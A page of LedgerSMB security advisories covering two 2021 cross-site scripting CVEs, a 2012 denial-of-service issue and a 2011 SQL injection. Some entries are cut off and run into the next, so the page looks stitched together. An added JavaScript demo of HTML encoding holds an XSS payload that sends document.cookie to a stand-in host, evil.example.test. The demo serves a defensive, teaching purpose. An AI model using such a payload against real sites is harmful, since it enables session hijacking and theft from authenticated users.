Security advisory

Security advisory for CVE-2021-3693 (Cross site scripting)

Submitted by ehu on Fri, 08/20/2021 - 03:14

DOM cross-site scripting of authenticated users in LedgerSMB

Summary

LedgerSMB does not check the origin of HTML fragments that it merges into the browser's DOM. An attacker who gets an authenticated user to open a specially crafted URL can abuse this flaw to run attacker-supplied code in that user's browser session and to disclose information from it.


Known vulnerable

  All of:

  - 1.5.0 up to 1.5.30 (inclusive)
  - 1.6.0 up to 1.6.33 (inclusive)
  - 1.7.0 up to 1.7.32 (inclusive)
  - 1.8.0 up to 1.8.17 (inclusive)


Known fixed

  - 1.7.33
  - 1.8.18

Security advisory for CVE-2021-3694 (Cross site scripting)

Submitted by ehu on Fri, 08/20/2021 - 03:13

Reflected cross-site scripting of authenticated users in LedgerSMB

Summary

LedgerSMB does not sufficiently HTML-encode error messages before sending them to the browser. An attacker who gets an authenticated user to open a specially crafted URL can abuse this flaw to run attacker-supplied code in that user's browser session and to disclose information from it.
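What "sufficiently HTML-encode" comes down to at the point where a request parameter is reflected into an error message, shown as an added JavaScript example that is not LedgerSMB's code: the same message rendered without and with encoding, plus a crude check for markup that was not in the template. The error template, the parameter name, the payload and all function names are assumptions made for the demo.

```javascript
// Added example, not LedgerSMB code: an error message built from a request
// parameter and reflected into an HTML page, without and with encoding.
// The template, the payload and the helper names are constructed for the demo.

// Encode the five characters that can end a text node or an attribute value.
function htmlEncode(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

// Vulnerable shape: the parameter is spliced straight into the error markup.
function renderErrorUnencoded(reportName) {
  return '<p class="error">Unknown report: ' + reportName + '</p>';
}

// Hardened shape: encode at the point where the value meets HTML.
function renderErrorEncoded(reportName) {
  return '<p class="error">Unknown report: ' + htmlEncode(reportName) + '</p>';
}

// Crude detector for the demo: anything that still looks like a tag inside the
// template's own <p> element came from the reflected value.
function containsInjectedTag(html) {
  const inner = html.replace(/^<p class="error">/, '').replace(/<\/p>$/, '');
  return /<[a-zA-Z!/]/.test(inner);
}

// Constructed payload as it would arrive in a query string parameter after
// the web server has URL-decoded it.
const PAYLOAD = '<script>location="https://evil.example.test/?c="+document.cookie</script>';

function demo() {
  const unencoded = renderErrorUnencoded(PAYLOAD);
  const encoded = renderErrorEncoded(PAYLOAD);
  return {
    unencoded,
    encoded,
    injectedUnencoded: containsInjectedTag(unencoded), // true: script runs
    injectedEncoded: containsInjectedTag(encoded),     // false: shown as text
  };
}

console.log(demo());
```

Encoding this way is correct for values that land in HTML text or in a quoted attribute. A value reflected into a `<script>` block, an event-handler attribute or a URL needs the encoding for that context instead, which is why a template engine with context-aware escaping is the usual fix rather than a hand-written function at each call site.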

Known vulnerable

  All of:

Security: Denial of Service Vulnerability in 1.3.20 and below

Submitted by Chris Travers on Mon, 07/30/2012 - 00:08

A security oversight has been discovered in LedgerSMB 1.3 that could allow a malicious user to cause a denial of service against LedgerSMB or otherwise affect the way in which certain forms of data get entered. In most cases we do not believe this to be particularly severe where internal process controls are in place. Users in some jurisdictions, however, may need to take this more seriously (see full details below).

Basic vulnerability characteristics

Security advisory: SQL Injection in LedgerSMB 1.2.24 and lower

Submitted by Chris Travers on Fri, 08/19/2011 - 14:59

Hi all;

The LedgerSMB development team has found an SQL injection issue in LedgerSMB 1.2.24. Because this issue stems from our common SQL-Ledger heritage, it affects all versions of LedgerSMB and has been confirmed in SQL-Ledger 2.8.33. We contacted Dieter when we initially discovered this, and now, three weeks later, it is unclear when this will be fixed on his side (his last communication said it was likely to be at least a few more weeks from now, with no committed timeline). It is expected that when SQL-Ledger 2.8.34 is released it will contain a fix for this issue.